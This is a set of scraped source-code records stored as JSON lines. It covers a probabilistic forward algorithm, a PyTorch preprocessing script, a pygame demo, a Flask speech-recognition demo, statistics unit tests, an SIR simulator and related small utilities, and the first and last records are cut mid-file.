np.abs(mean_p - var_p) < 1e-6:\n # if True:\n distn = 'poiss'\n theta = MM_Poiss(mean_p)\n lmbda = lambda s, theta = theta, Z = Z: Z * fwd.poisson_pgf(s, theta)\n elif mean_p < var_p:\n distn = 'nb'\n theta = MM_NB(mean_p, var_p)\n lmbda = lambda s, theta = theta, Z = Z: Z * fwd.negbin_pgf(s, theta)\n elif mean_p > var_p:\n distn = 'binom'\n theta = MM_Binom(mean_p, var_p)\n lmbda = lambda s, theta = theta, Z = Z: Z * fwd.binomial_pgf(s, theta)\n else:\n raise Exception('Unable to approximate PGF.')\n\n return_vals = {'name': distn, 'param': theta, 'lambda': lmbda}\n return([return_vals[key] for key in return_type])\n\ndef APGF_Forward_symb(y,\n immigration_pgf,\n theta_immigration,\n offspring_pgf,\n theta_offspring,\n rho,\n GDualType=gd.LSGDual):\n K = len(y)\n\n ### reverse pass to compute all of the s, u arguments to Gamma, Alpha\n # s = [None] * (K + 1)\n # u = [None] * K\n # s[K] = GDualType.const(1.0)\n #\n # for i in range(1, K):\n # u[-i] = s[-i] * (1 - rho[-i])\n # s[-i-1] = offspring_pgf(u[-i], theta_offspring[-i])\n\n ### forward pass to evaluate Alpha, Gamma\n # Alpha_vec = [None] * K\n Gamma_vec = [None] * K\n Z_vec = [None] * K\n # Gamma_hat_vec = [None] * K\n\n Alpha_lmbda_vec = [None] * K\n\n for i in range(K):\n # compute the Gamma message given Alpha[i] = Alpha_{i-1}(s_{i-1})\n if i == 0:\n Gamma_vec[i] = lambda u, k=i: immigration_pgf(u, theta_immigration[k])\n else:\n Gamma_vec[i] = lambda u, k=i: Alpha_lmbda_vec[k-1](offspring_pgf(u, theta_offspring[k-1])) * immigration_pgf(u, theta_immigration[k])\n\n # compute Gamma_hat, the approximating distribution, using APGF\n Z_vec[i] = Gamma_vec[i](GDualType.const(1)).get(0, as_log=False)\n Gamma_hat = APGF(Gamma_vec[i], Z_vec[i], GDualType = GDualType, return_type = ['name', 'param'])\n Gamma_hat_distn = Gamma_hat[0]\n Gamma_hat_theta = Gamma_hat[1]\n\n # use Gamma_hat to construct the next Alpha message\n if Gamma_hat_distn == 'poiss':\n Alpha_lmbda_vec[i] = lambda s_k, k=i, lmbda = Gamma_hat_theta[0]: \\\n GDualType.const(np.log(Z_vec[k]) + y[k] * (np.log(lmbda) + np.log(rho[k])) - lmbda - gammaln(y[k] + 1), as_log=True) \\\n * (s_k ** y[k]) * np.exp(lmbda * (1 - rho[k]) * s_k)\n elif Gamma_hat_distn == 'nb':\n Alpha_lmbda_vec[i] = lambda s_k, k=i, r=Gamma_hat_theta[0], p=Gamma_hat_theta[1]: \\\n GDualType.const(np.log(Z_vec[k]) + y[k] * (np.log(1 - p) + np.log(rho[k])) + r * np.log(p) + gammaln(r + y[k]) - gammaln(y[k] + 1) - gammaln(r), as_log=True) \\\n * (s_k ** y[k]) * ((1 - (1 - rho[k]) * (1 - p) * s_k) ** (-r - y[k]))\n elif Gamma_hat_distn == 'binom':\n Alpha_lmbda_vec[i] = lambda s_k, k=i, n=Gamma_hat_theta[0], p=Gamma_hat_theta[1]: \\\n GDualType.const(np.log(Z_vec[k]) + y[k] * (np.log(p) + np.log(rho[k])) + gammaln(n + 1) - gammaln(y[k] + 1) - gammaln(n - y[k] + 1), as_log=True) \\\n * (s_k ** y[k]) * ((1 - p + (p * (1 - rho[k]) * s_k)) ** (n - y[k]))\n\n return Alpha_lmbda_vec[-1](GDualType.const(1.0))\n\n# def APGF_Forward_symb(y,\n# immigration_pgf,\n# theta_immigration,\n# offspring_pgf,\n# theta_offspring,\n# rho,\n# GDualType=gd.LSGDual,\n# d=0):\n# def Gamma_k(u_k, k):\n# s_kminus1 = offspring_pgf(u_k, theta_offspring[k-1])\n# return Alpha_k(s_kminus1, k - 1) * immigration_pgf(u_k, theta_immigration[k])\n#\n# def Alpha_k(s_k, k):\n# # base case, Alpha_0 = 1.0\n# if k < 0:\n# return GDualType.const(1.0, q = s_k.order())\n#\n# u_k = s_k * (1 - rho[k])\n# Gamma = lambda u, k=k: Gamma_k(u, k)\n#\n# # select a parametric distn to approximate Gamma\n# gamma_logZ = Gamma(GDualType.const(1)).get(0, as_log=True)\n# apgf_res = APGF(Gamma, gamma_logZ, GDualType=GDualType, return_type=['name', 'param'])\n# apgf_distn = apgf_res[0]\n# apgf_theta = apgf_res[1]\n#\n# # compute the parts of A_k that don't depend on Gamma\n# val = s_k ** y[k]\n# val *= GDualType.const(y[k] * np.log(rho[k]) - gammaln(y[k] + 1), as_log=True)\n#\n# # add the parts that depend on Gamma\n# if apgf_distn == 'poiss':\n# lmbda = apgf_theta[0]\n# # const parts\n# val *= GDualType.const(y[k] * np.log(lmbda) - lmbda, as_log = True)\n# # gdual parts\n# val *= np.exp(s_k * lmbda * (1 - rho[k]))\n# elif apgf_distn == 'nb':\n# r = apgf_theta[0]\n# p = apgf_theta[1]\n# # const parts\n# val *= GDualType.const(r * np.log(p) + y[k] * np.log(1 - p) + gammaln(r + y[k]) - gammaln(r), as_log = True)\n# # gdual parts\n# val *= (1 - (1 - rho[k]) * (1 - p) * s_k) ** (-r - y[k])\n# elif apgf_distn == 'binom':\n# n = apgf_theta[0]\n# p = apgf_theta[1]\n# # const parts\n# val *= GDualType.const(y[k] * np.log(p) + gammaln(n + 1) - gammaln(n - y + 1), as_log = True)\n# # gdual parts\n# val *= (1 - p + p * (1 - rho[k]) * s_k) ** (n - y[k])\n#\n# val /= GDualType.const(gamma_logZ, as_log = True)\n#\n# return val\n#\n# K = len(y)\n# A_K = Alpha_k(GDualType.const(1.0), K - 1)\n#\n# return A_K\n\nif __name__ == '__main__':\n # currently np.exp(any LSGDual) throws this warning, but it can be ignored until we figure out why it happens\n import warnings\n warnings.filterwarnings(\"ignore\", category=RuntimeWarning, message=\"divide by zero encountered in exp\")\n\n import time\n\n # F = lambda s: fwd.binomial_pgf(s, [10000, 0.2])\n #\n # print(APGF(F))\n #\n # F = lambda s: fwd.poisson_pgf(s, [10000])\n #\n # print(APGF(F))\n #\n # F = lambda s: fwd.negbin_pgf(s, [10000, 0.2])\n #\n # print(APGF(F))\n #\n # F = lambda s: fwd.geometric2_pgf(s, [0.3])\n #\n # print(APGF(F))\n #\n # F = lambda s: 1/156 * fwd.poisson_pgf(s, [10000])\n #\n # print(APGF(F))\n\n y = 10 * np.array([1, 2, 3, 1, 3])\n lmbda = 10 * np.array([2.5, 6, 6, 6, 6]).reshape(-1, 1)\n delta = np.array([0.5, 0.5, 0.5, 0.5]).reshape(-1, 1)\n rho = np.array([0.2, 0.2, 0.2, 0.2, 0.2])\n\n start = time.process_time()\n for rep in range(3):\n A = APGF_Forward_symb(y,\n fwd.poisson_pgf,\n lmbda,\n fwd.bernoulli_pgf,\n delta,\n rho,\n GDualType=gd.LSGDual)\n print(time.process_time() - start)\n\n # print(A.get(0, as_log = True))\n #\n start = time.process_time()\n for rep in range(3):\n logZ, alpha, marginals = fwd.forward(y,\n fwd.poisson_pgf,\n lmbda,\n fwd.bernoulli_pgf,\n delta,\n rho,\n GDualType=gd.LSGDual,\n d=0)\n print(time.process_time() - start)\n # print(logZ)\n\n from apgf_forward_log import APGF_Forward\n\n start = time.process_time()\n for rep in range(3):\n res = APGF_Forward(y,\n fwd.poisson_pgf,\n lmbda,\n fwd.bernoulli_pgf,\n delta,\n rho,\n GDualType=gd.LSGDual,\n d=0)\n print(time.process_time() - start)\n\n # print(res)","sub_path":"python/deprecated/apgf_forward_symb_log0.py","file_name":"apgf_forward_symb_log0.py","file_ext":"py","file_size_in_byte":10756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"90552753","text":"from utils import *\r\nfrom net import *\r\nfrom torch.utils.data import Dataset, DataLoader\r\nimport numpy as np\r\nimport torch\r\nimport glob\r\nimport torch.nn as nn\r\nimport argparse\r\ndevice = ('cuda' if torch.cuda.is_available() else 'cpu')\r\n\r\nparser = argparse.ArgumentParser()\r\n\r\nparser.add_argument('--backbone', type=str, default='vgg19',\r\n help='backbone') #'vgg19' or 'googlenet'\r\nparser.add_argument('--split', type=str, default='test',\r\n help='split')\r\n\r\nconfig = parser.parse_args(args=[])\r\n\r\nclass my_dataset(Dataset):\r\n def __init__(self, store_path, split, name, data_transform=None):\r\n self.store_path = store_path\r\n self.split = split\r\n self.transforms=data_transform\r\n self.names = name\r\n self.data_list = []\r\n self.label_list = []\r\n for n,i in enumerate(self.names):\r\n if split =='train':\r\n for file in glob.glob(self.store_path + '/' + split +'/'+i+ '/*.npy'):\r\n cur_path = file.replace('\\\\', '/')\r\n if n==4:\r\n for j in range(10):\r\n self.data_list.append(cur_path)\r\n self.label_list.append(n)\r\n else:\r\n self.data_list.append(cur_path)\r\n self.label_list.append(n)\r\n else:\r\n for file in glob.glob(self.store_path + '/' + split +'/'+i+ '/*.npy'):\r\n cur_path = file.replace('\\\\', '/')\r\n self.data_list.append(cur_path)\r\n self.label_list.append(n)\r\n\r\n\r\n def __getitem__(self, item):\r\n data = self.transforms(self.data_list[item])\r\n label = self.label_list[item]\r\n return data, label\r\n\r\n def __len__(self):\r\n return len(self.data_list)\r\n\r\ndef save_feature(feature,target,n):\r\n #保存预处理后的特征到对应文件夹下\r\n target=target.cpu().numpy()\r\n np.save(os.getcwd()+'/'+config.backbone+'/'+config.split+'/'+'00'+str(target)+'/'+'feature'+str(n)+'_'+str(target)+'.npy',feature)\r\n\r\n\r\n\r\ndef pre_function(inputs,targets,model,n):\r\n #预处理函数\r\n inputs=inputs.to(device)\r\n targets=targets.to(device)\r\n inputs=inputs.squeeze(1)\r\n for b in range(inputs.shape[0]):\r\n feature=np.zeros((4,1,14336))\r\n for i in range(inputs.shape[1]):\r\n inputs1=inputs[b, i, :, :, 0].unsqueeze(0)\r\n inputs2=inputs[b, i, :, :, 1].unsqueeze(0)\r\n input1=torch.from_numpy(np.zeros((1,3,224,224)).astype(np.float32)).to(device)\r\n input1[0,0, :, :] = inputs1\r\n input1[0,1, :, :] = inputs1\r\n input1[0,2, :, :] = inputs1\r\n input2 = torch.from_numpy(np.zeros((1,3, 224, 224)).astype(np.float32)).to(device)\r\n input2[0,0,:,:]=inputs2\r\n input2[0,1, :, :] = inputs2\r\n input2[0,2, :, :] = inputs2\r\n T=ready_for_MTLN(input1,input2,model)\r\n feature[i]=T.detach().cpu().numpy()\r\n save_feature(feature,targets[b],n)\r\n n+=1\r\n return n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n split = config.split\r\n store_path = './data'\r\n name=['000','001','002','003','004']\r\n if split=='train':\r\n train_dataset =my_dataset(store_path, split, name, pre_treat_train)\r\n else:\r\n train_dataset = my_dataset(store_path, split, name, pre_treat_test)\r\n # 下面加载所需网络的预训练参数\r\n if config.backbone=='vgg19':\r\n\r\n model_before=models.vgg19(pretrained=True)\r\n t=[]\r\n for i,layer in enumerate(model_before.children()):\r\n for j,sublayer in enumerate(layer.children()):\r\n if i==0 and j<30:\r\n t.append(sublayer)\r\n model = nn.Sequential(*t)\r\n\r\n else:\r\n model_before = models.googlenet(pretrained=True)\r\n model = nn.Sequential(*list(model_before.children())[0:11])\r\n\r\n model = model.to(device)\r\n n=0\r\n dataset_loader = DataLoader(train_dataset, batch_size=1, shuffle=True, num_workers=0)\r\n for inputs,targets in dataset_loader:\r\n n=pre_function(inputs,targets, model,n)","sub_path":"pretreat.py","file_name":"pretreat.py","file_ext":"py","file_size_in_byte":4191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"14176936","text":"## tileFactory.py\r\n## Andrew Herrera and Benjamin Rose\r\n## Fall 2016\r\n\r\n# Example of a call:\r\n# temp_row = randint(1,6)\r\n# tile1 = tileFactory(140, 1, temp_row)\r\n# tiles_list.append(tile1)\r\n# possible \"tile\" + str(tile_count) = tileFactory(140, 1, temp_row)\r\n\r\nimport pygame, sys\r\nfrom pygame.locals import *\r\nfrom random import randint\r\n\r\nBLACK = (0, 0, 0)\r\n\r\nDISPLAYSURF = pygame.display.set_mode((1280, 720))\r\nDISPLAYSURF.fill(BLACK)\r\n\r\n\r\nclass tileFactory(object):\r\n def __init__(self, scrollspeed, tankorfighterlevel, tilerow):\r\n self.scroll = scrollspeed\r\n self.torf = tankorfighterlevel\r\n self.scrolled_amount = 0\r\n self.pixel_frac_balance = 1\r\n row_assigned = 0\r\n TILESIZE = 140\r\n self.DRAWDISTANCE = 2000\r\n # If there are performance problems, lowering the draw distance\r\n # should help. But it should never go below DISPLAYHEIGHT + 140.\r\n \r\n if tilerow == 6 and row_assigned == 0:\r\n self.row = 0\r\n row_assigned = 1\r\n # It's easier to think about the tile rows as going from row 1, the\r\n # lowest, to row 6, the highest, calculations are easier if it goes\r\n # from 0 being the top row to 5 being the bottom row. This part allows\r\n # the input to be the easier-to-think about one and then simply\r\n # changes the row value to the one far more convenient for in-code\r\n # uses.\r\n elif tilerow == 5 and row_assigned == 0:\r\n self.row = 1\r\n row_assigned = 1\r\n elif tilerow == 4 and row_assigned == 0:\r\n self.row = 2\r\n row_assigned = 1\r\n elif tilerow == 3 and row_assigned == 0:\r\n self.row = 3\r\n row_assigned = 1\r\n elif tilerow == 2 and row_assigned == 0:\r\n self.row = 4\r\n row_assigned = 1\r\n elif tilerow == 1 and row_assigned == 0:\r\n self.row = 5\r\n row_assigned = 1\r\n\r\n self.pos = (self.DRAWDISTANCE, int(self.row * TILESIZE))\r\n\r\n self.TILESURF = pygame.Surface((TILESIZE, TILESIZE))\r\n self.TILESURF = pygame.image.load(\"tile.png\")\r\n self.TILESURF = pygame.transform.scale(self.TILESURF, (TILESIZE, TILESIZE))\r\n TILESURF = self.TILESURF\r\n\r\n def pos_change(self):\r\n\r\n if self.torf == 1:\r\n self.pixel_scroll_num = 2\r\n if self.pixel_frac_balance == 3:\r\n self.pixel_scroll_num = 3\r\n self.pixel_frac_balance = 1\r\n else:\r\n self.pixel_frac_balance += 1\r\n # Balances out the cut off 0.33 pixel lost in a scroll rate of\r\n # 140 / 60 (2.33 pixels) per frame speed. If scroll speed is\r\n # adjusted, this part will need to be tweaked slightly.\r\n self.scrolled_amount += self.pixel_scroll_num\r\n self.pos = (self.DRAWDISTANCE - self.scrolled_amount, self.pos[1])\r\n pos = self.pos\r\n\r\n if self.torf == 2:\r\n pass\r\n # Will be written once fighter scroll speed is determined.\r\n\r\ndef main():\r\n tile_list = []\r\n## tile1 = tileFactory(140, 1, 1)\r\n## tile_list.append(tile1)\r\n t = 0\r\n tile_make_in = 0\r\n tm = [0, 0, 0, 0, 0]\r\n## \r\n## for x in range(5):\r\n## temp_row = randint(1, 6)\r\n## tile_list[x] = tileFactory(140, 1, temp_row)\r\n while True:\r\n for event in pygame.event.get():\r\n if event.type == QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n \r\n pygame.time.wait(17)\r\n t += 1\r\n\r\n if tile_make_in == 61:\r\n temp_row = randint(1, 6)\r\n for x in range(1):\r\n tile_list[x] = tileFactory(140, 1, temp_row)\r\n tile_make_in = 0\r\n \r\n tile_make_in += 1\r\n\r\n## if t >= 60 and t < 120 and tm[0] == 0:\r\n## tile2 = tileFactory(140, 1, 2)\r\n## tile_list.append(tile2)\r\n## tm[0] = 1\r\n## elif t >= 120 and t < 180 and tm[1] == 0:\r\n## tile3 = tileFactory(140, 1, 3)\r\n## tile_list.append(tile3)\r\n## tm[1] = 1\r\n## elif t >= 180 and t < 240 and tm[2] == 0:\r\n## tile4 = tileFactory(140, 1, 4)\r\n## tile_list.append(tile4)\r\n## tm[2] = 1\r\n## elif t >= 240 and t < 300 and tm[3] == 0:\r\n## tile5 = tileFactory(140, 1, 5)\r\n## tile_list.append(tile5)\r\n## tm[3] = 1\r\n## elif t >= 300 and tm[4] == 0:\r\n## tile6 = tileFactory(140, 1, 6)\r\n## tile_list.append(tile6)\r\n## tm[4] = 1\r\n \r\n \r\n for tile in tile_list:\r\n tile.pos_change()\r\n DISPLAYSURF.fill(BLACK)\r\n for tile in tile_list:\r\n DISPLAYSURF.blit(tile.TILESURF, tile.pos)\r\n \r\n pygame.display.update()\r\n\r\nmain()\r\n","sub_path":"tileFactoryexperiment.py","file_name":"tileFactoryexperiment.py","file_ext":"py","file_size_in_byte":4869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"184663839","text":"n = int(input(\"Nhập tháng vào: \"))\r\ndef HIEN_THI(n):\r\n if(1<=3 and n <=3):\r\n print(\"Mùa Xuân\")\r\n elif(3<=6 and n <= 6):\r\n print(\"Mùa Hạ\")\r\n elif (7<=9 and n <= 9):\r\n print(\"Mùa Thu\")\r\n elif(9<=12 and n <= 12):\r\n print(\"Mùa Đông\")\r\nHIEN_THI(n)\r\n ","sub_path":"BaiTap4.py","file_name":"BaiTap4.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"598905451","text":"import os\nfrom flask_cors import CORS, cross_origin\nfrom flask import Flask, request, render_template, jsonify\nfrom werkzeug.utils import secure_filename\nimport numpy as np\nimport librosa\nimport soundfile as sf\nimport ffmpeg\nimport base64\nimport uuid\nimport json\nfrom recognizer import Recognizer\n\napp = Flask(__name__)\nCORS(app)\n\nrecognizer = Recognizer(output_dir='logs',\n model_cfg='tasks/SpeechRecognition/ktelspeech/configs/jasper10x5dr_sp_offline_specaugment.yaml',\n ckpt='tasks/SpeechRecognition/ktelspeech/checkpoints/Jasper_epoch80_checkpoint.pt',\n task_path=\"tasks.SpeechRecognition.ktelspeech.local.manifest\",\n vocab=\"tasks/SpeechRecognition/ktelspeech/data/KtelSpeech/vocab\")\nrecognizer.load_model()\n\n\n@app.route('/')\ndef index():\n return render_template('index_tel_offline.html')\n\n\n@app.route('/recognize', methods=['POST'])\ndef file_upload():\n data = request.get_json()\n print(\"uid: \", data[\"uid\"])\n print(\"sid: \", data[\"sid\"])\n dec_data = base64.b64decode(data[\"data\"])\n\n os.makedirs('./logs', exist_ok=True)\n file_name = os.path.join('./logs', secure_filename(str(uuid.uuid4())))\n wav_file_name = file_name + '.wav'\n\n with open(file_name, mode='wb') as fd:\n fd.write(dec_data)\n _ = (ffmpeg.input(file_name)\n .output(wav_file_name, format='wav', acodec='pcm_s16le', ac=1, ar=16000)\n .overwrite_output()\n .global_args('-hide_banner')\n .global_args('-loglevel', 'error')\n .run())\n\n text = recognizer.transcribe(wav_file_name, option=1)\n\n os.remove(wav_file_name)\n os.remove(file_name)\n\n return jsonify({\"text\": text})\n\n\nif __name__ == \"__main__\":\n app.run(port=15005)\n","sub_path":"demo/offline_tel_demo.py","file_name":"offline_tel_demo.py","file_ext":"py","file_size_in_byte":1795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"550334412","text":"# -*- coding: utf-8 -*-\n# \n# Unit tests for the Simple Statistics library\n# \n# Copyright 2020 AI Mechanics & Tech\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\n#----- Imports\nimport unittest\nimport random\n\nfrom amtStats import Statistics\n\n\n#----- Globals\nRANDOM_SEED_VALUE = 1234\nRANDOM_MIN_VALUE = 1\nRANDOM_MAX_VALUE = 100\nRANDOM_ODD_VALUE = 35\nRANDOM_EVEN_VALUE = 78\n\n#----- Classes\nclass TestQuantiles(unittest.TestCase):\n\n def setUp(self):\n random.seed(RANDOM_SEED_VALUE)\n self.obj = Statistics()\n\n def test_Q1_odd(self):\n for _ in range(RANDOM_ODD_VALUE):\n self.obj.update(random.randint(RANDOM_MIN_VALUE, RANDOM_MAX_VALUE))\n \n median = self.obj._quantile(self.obj.values, 1)\n self.assertEqual(median, 12.0)\n\n def test_Q2_odd(self):\n for _ in range(RANDOM_ODD_VALUE):\n self.obj.update(random.randint(RANDOM_MIN_VALUE, RANDOM_MAX_VALUE))\n \n median = self.obj._quantile(self.obj.values, 2)\n self.assertEqual(median, 45.0)\n\n def test_Q3_odd(self):\n for _ in range(RANDOM_ODD_VALUE):\n self.obj.update(random.randint(RANDOM_MIN_VALUE, RANDOM_MAX_VALUE))\n \n median = self.obj._quantile(self.obj.values, 3)\n self.assertEqual(median, 77.0)\n\n\n def test_Q1_even(self):\n for _ in range(RANDOM_EVEN_VALUE):\n self.obj.update(random.randint(RANDOM_MIN_VALUE, RANDOM_MAX_VALUE))\n \n median = self.obj._quantile(self.obj.values, 1)\n self.assertEqual(median, 12.0)\n\n def test_Q2_even(self):\n for _ in range(RANDOM_EVEN_VALUE):\n self.obj.update(random.randint(RANDOM_MIN_VALUE, RANDOM_MAX_VALUE))\n \n median = self.obj._quantile(self.obj.values, 2)\n self.assertEqual(median, 44.0)\n\n def test_Q3_even(self):\n for _ in range(RANDOM_EVEN_VALUE):\n self.obj.update(random.randint(RANDOM_MIN_VALUE, RANDOM_MAX_VALUE))\n \n median = self.obj._quantile(self.obj.values, 3)\n self.assertEqual(median, 72.0)\n\n def test_empty_values(self):\n with self.assertRaises(ValueError):\n self.obj._quantile([], 1)\n \n def test_only_one_value(self):\n self.obj.update(42)\n self.assertEqual(self.obj._quantile(self.obj.values, 1), 42)\n ","sub_path":"tests/testQuantile.py","file_name":"testQuantile.py","file_ext":"py","file_size_in_byte":2817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"359093936","text":"import numpy as np\nimport math\nimport scipy.stats as stats\nfrom abc import ABCMeta, abstractmethod\nimport distributions \nimport utils_math\nfrom problems import ABC_problems\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.pyplot as plt\nimport time\n\n\nclass SIR_Problem(ABC_problems.ABC_Problem):\n\n '''\n SIR epidemic model with two parameters. Please see ICML18' - Black-box Variational Inference for Stochastic Differential Equations\n '''\n\n def __init__(self, N=100, n=50):\n\n self.N = N # number of parameter samples\n self.n = n # number of data samples in each simulation\n\n self.prior = [distributions.uniform, distributions.uniform]\n self.prior_args = np.array([[1.5, 2.4], [0.2, 0.6]])\n self.simulator_args = ['theta1', 'theta2'] # just for information\n self.K = 2 # number of parameters\n\n self.true_theta1 = 1.75\n self.true_theta2 = 0.475\n self.T = 8\n\n def get_true_theta(self):\n return np.array([self.true_theta1, self.true_theta2])\n\n def statistics(self, data, theta=None):\n # some preparation\n n_stat_per_dim = int(self.n/4)\n stat = np.zeros([1, 2*n_stat_per_dim])\n x, y = data[:, 0].copy(), data[:, 1].copy()\n\n # take (x_t, y_t) every 2 timestamps\n idx = np.linspace(1, self.n-1, n_stat_per_dim).astype(int)\n xx = x[idx]\n yy = y[idx]\n\n stat[:, 0:n_stat_per_dim] = xx\n stat[:, n_stat_per_dim:2*n_stat_per_dim] = yy\n return stat\n\n def simulator(self, theta):\n # get the params\n theta1 = theta[0]\n theta2 = theta[1]\n\n # noises\n T, d = self.T, self.n+1\n dt = T/d\n\n # data\n x = np.zeros([self.n, 2])\n x[0, 0], x[0, 1] = 100, 1\n N = x[0, 0] + x[0, 1]\n eps = distributions.normal_nd.draw_samples(mean=[0,0], cov=np.array([[1, 0], [0, 1]]), N=self.n)\n for t in range(self.n-1):\n S, I = x[t, 0], x[t, 1]\n s, i = S/N, I/N\n a, b = theta1*s*i, theta2*i\n alpha = np.array([-a, a - b])\n beta_sqrt = np.array([[a**0.5, 0], [-a**0.5, b**0.5]])\n dx = alpha*dt + (1/N**0.5)*(dt**0.5)*np.matmul(beta_sqrt, eps[t, :])\n tmp = x[t, :] + dx*N\n x[t+1, :] = np.log(np.exp(tmp)+1)\n return x/N\n\n def sample_from_prior(self):\n sample_theta1 = self.prior[0].draw_samples(self.prior_args[0, 0], self.prior_args[0, 1], 1)[0]\n sample_theta2 = self.prior[1].draw_samples(self.prior_args[1, 0], self.prior_args[1, 1], 1)[0]\n return np.array([sample_theta1, sample_theta2])\n \n def visualize(self):\n plt.figure()\n t = np.linspace(0, self.n, self.n).astype(int)\n plt.plot(t, self.data_obs[:, 0], '-',mfc='none', color='r', label='S')\n plt.plot(t, self.data_obs[:, 1], '-',mfc='none', color='b', label='I')\n plt.plot(t, self.data_obs[:, 0], 'o',mfc='none', color='r')\n plt.plot(t, self.data_obs[:, 1], '^',mfc='none', color='b')\n plt.xlabel('time t')\n plt.ylabel('data x')\n plt.legend()\n plt.show()","sub_path":"problems/problem_SIR.py","file_name":"problem_SIR.py","file_ext":"py","file_size_in_byte":3373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"182686471","text":"\"\"\"\n==============================\nCreate 3D histogram of 2D data\n==============================\n\nDemo of a histogram for 2 dimensional data as a bar graph in 3D.\n\"\"\"\n\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n# Fixing random state for reproducibility\nnp.random.seed(19680801)\n\n\nfig = plt.figure()\nax = fig.add_subplot(111, projection='3d')\nx, y = np.random.rand(2, 100) * 4\nhist, xedges, yedges = np.histogram2d(x, y, bins=4, range=[[0, 4], [0, 4]])\n\n# Construct arrays for the anchor positions of the 16 bars.\n# Note: np.meshgrid gives arrays in (ny, nx) so we use 'F' to flatten xpos,\n# ypos in column-major order. For numpy >= 1.7, we could instead call meshgrid\n# with indexing='ij'.\nxpos, ypos = np.meshgrid(xedges[:-1] + 0.25, yedges[:-1] + 0.25)\nxpos = xpos.flatten('F')\nypos = ypos.flatten('F')\nzpos = np.zeros_like(xpos)\n\n# Construct arrays with the dimensions for the 16 bars.\ndx = 0.5 * np.ones_like(zpos)\ndy = dx.copy()\ndz = hist.flatten()\n\nax.bar3d(xpos, ypos, zpos, dx, dy, dz, color='b', zsort='average')\n\nplt.show()\n","sub_path":"Packages/matplotlib-2.2.2/examples/mplot3d/hist3d.py","file_name":"hist3d.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"575186482","text":"from flask import g, url_for, redirect, flash\nfrom flask import session as login_session \nfrom ... import checkAccessToken, clearLoginSession \n \nfrom . import mod_oauth2\nfrom .gdisconnect import gdisconnect\nfrom .fbdisconnect import fbdisconnect\n\n@mod_oauth2.route('/disconnect')\n@mod_oauth2.route('/logout')\ndef disconnect():\n\tisSessionValid = checkAccessToken()\n\tUSER = g.user\n\tif ('provider' in login_session):\n\t if isSessionValid:\n\t if login_session.get('provider') == 'google':\n\t gdisconnect()\n\t if login_session.get('provider') == 'facebook':\n\t fbdisconnect()\n\t flash(\"You have successfully been logged out.\")\n\t return redirect(url_for('home.landing_page'))\n\telif USER: \n\t\tclearLoginSession()\n\t\tflash(\"You have successfully been logged out.\")\n\t\treturn redirect(url_for('home.landing_page'))\n\telse:\n\t\tclearLoginSession()\n\t\tflash(\"You were not logged in\")\n\t\treturn redirect(url_for('home.landing_page'))\n","sub_path":"app/views/mod_oauth2/logout.py","file_name":"logout.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"326690736","text":"from PIL import Image\nfrom io import BytesIO\nfrom django.core.files.uploadedfile import InMemoryUploadedFile\nimport sys\n\n\ndef rescale_image(self, img):\n # Opening the uploaded image\n size = (128, 128)\n im = Image.open(img)\n\n output = BytesIO()\n\n # Resize/modify the image\n im = im.resize((650, 350))\n\n # after modifications, save it to the output\n im.save(output, format='JPEG', quality=100)\n output.seek(0)\n\n im = InMemoryUploadedFile(output, 'ImageField', \"%s.jpg\" % self.service_image1.name.split('.')[\n 0], 'image/jpeg', sys.getsizeof(output), None)\n\n return im\n","sub_path":"website/websiteapp/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"211101170","text":"import sys\nsys.path.append(\"/home/shuyanzh/workshop/tql-transformer/\")\nimport time\nimport functools\nimport numpy as np\nimport math\nimport torch\nfrom torch import nn\nimport torch.nn.functional as F\nfrom src.utils.util_func import *\nfrom copy import deepcopy\nfrom src.data_loader import DataLoader, Batch\nfrom src.config import argps\nfrom src.train import make_model\nimport pickle\nfrom collections import defaultdict\nimport sentencepiece as spm\n\nfrom src.beam_search import beam_search_decode_step,beam_search_decode\n\nprint = functools.partial(print, flush=True)\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\ndef test_data_iter(test_file, src_suffix, trg_suffix, w2i_src, w2i_trg):\n # read data\n src_file = open(test_file + \".\" + src_suffix, \"r\", encoding=\"utf-8\")\n trg_file = open(test_file + \".\" + trg_suffix, \"r\", encoding=\"utf-8\")\n line_tot = 0\n for src_line, trg_line in zip(src_file, trg_file):\n line_tot += 1\n src_tks = src_line.strip().split()\n trg_tks = trg_line.strip().split()\n src = [w2i_src[tk] for tk in src_tks ]\n trg = [w2i_trg[tk] for tk in [\"\"] + trg_tks + [\"\"]]\n src = torch.LongTensor([src])\n trg = torch.LongTensor([trg])\n yield(Batch(src, trg))\n src_file.close()\n trg_file.close()\n print(\"[INFO] total test {:d}\".format(line_tot))\n\ndef greedy_decode(model, src, src_mask, max_len, start_symbol, end_symbol):\n memory = model.encode(src, src_mask)\n ys = torch.ones(1, 1).fill_(start_symbol).long().to(device)\n for i in 